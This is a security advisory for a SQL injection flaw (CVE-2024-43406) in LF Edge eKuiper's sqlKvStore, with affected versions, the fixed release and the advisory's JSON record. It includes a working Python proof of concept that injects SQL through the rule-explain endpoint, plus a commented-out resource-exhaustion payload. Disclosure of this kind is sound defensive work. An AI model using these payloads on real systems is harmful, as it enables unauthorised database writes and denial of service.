GHSA-r5ph-4jxm-6j9p
Vulnerability from github
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.
Details
I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.
The SQL injection can happen in the code: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93 The code to accept user input is: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277
The rule id in the above code can be used to exploit SQL query.
Note that the delete function is also vulnerable: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141
PoC
``` import requests from urllib.parse import quote
SELECT val FROM 'xxx' WHERE key='%s';
payload = f"""'; ATTACH DATABASE 'test93' AS test93; CREATE TABLE test93.pwn (dataz text); INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""
payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"
url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler
res = requests.get(url) print(res.content) ```
The screenshot shows the malicious SQL query to insert a value:
The screenshot shows the breakpoint of executing the query:
Impact
SQL Injection vulnerability
The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.
{ affected: [ { package: { ecosystem: "Go", name: "github.com/lf-edge/ekuiper", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "1.14.2", }, ], type: "ECOSYSTEM", }, ], }, { package: { ecosystem: "PyPI", name: "ekuiper", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "1.14.2", }, ], type: "ECOSYSTEM", }, ], }, ], aliases: [ "CVE-2024-43406", ], database_specific: { cwe_ids: [ "CWE-89", ], github_reviewed: true, github_reviewed_at: "2024-08-20T20:04:31Z", nvd_published_at: "2024-08-20T15:15:24Z", severity: "HIGH", }, details: "### Summary\nA user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. \n\n### Details\nI will use explainRuleHandler (\"/rules/{name}/explain\") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.\n\nThe SQL injection can happen in the code:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93\nThe code to accept user input is:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277\n\nThe rule id in the above code can be used to exploit SQL query.\n\nNote that the delete function is also vulnerable:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141\n\n### PoC\n```\nimport requests\nfrom urllib.parse import quote\n\n# SELECT val FROM 'xxx' WHERE key='%s';\npayload = f\"\"\"'; ATTACH DATABASE 'test93' AS test93;\nCREATE TABLE test93.pwn (dataz text);\nINSERT INTO test93.pwn (dataz) VALUES (\"sql injection\");--\"\"\"\n\n#payload = \"deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--\"\n\nurl = f\"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain\" # explainRuleHandler\n\nres = requests.get(url)\nprint(res.content)\n```\n\nThe screenshot shows the malicious SQL query to insert a value:\n\n\nThe screenshot shows the breakpoint of executing the query:\n\n\n\n\n\n### Impact\nSQL Injection vulnerability\n\nThe reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.\n", id: "GHSA-r5ph-4jxm-6j9p", modified: "2024-08-27T14:27:18Z", published: "2024-08-20T20:04:31Z", references: [ { type: "WEB", url: "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p", }, { type: "ADVISORY", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43406", }, { type: "WEB", url: "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503", }, { type: "PACKAGE", url: "https://github.com/lf-edge/ekuiper", }, { type: "WEB", url: "https://github.com/pypa/advisory-database/tree/main/vulns/ekuiper/PYSEC-2024-72.yaml", }, ], schema_version: "1.4.0", severity: [ { score: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", type: "CVSS_V3", }, { score: "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N", type: "CVSS_V4", }, ], summary: "LF Edge eKuiper has a SQL Injection in sqlKvStore", }
Log in or create an account to share your comment.
This schema specifies the format of a comment related to a security advisory.
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.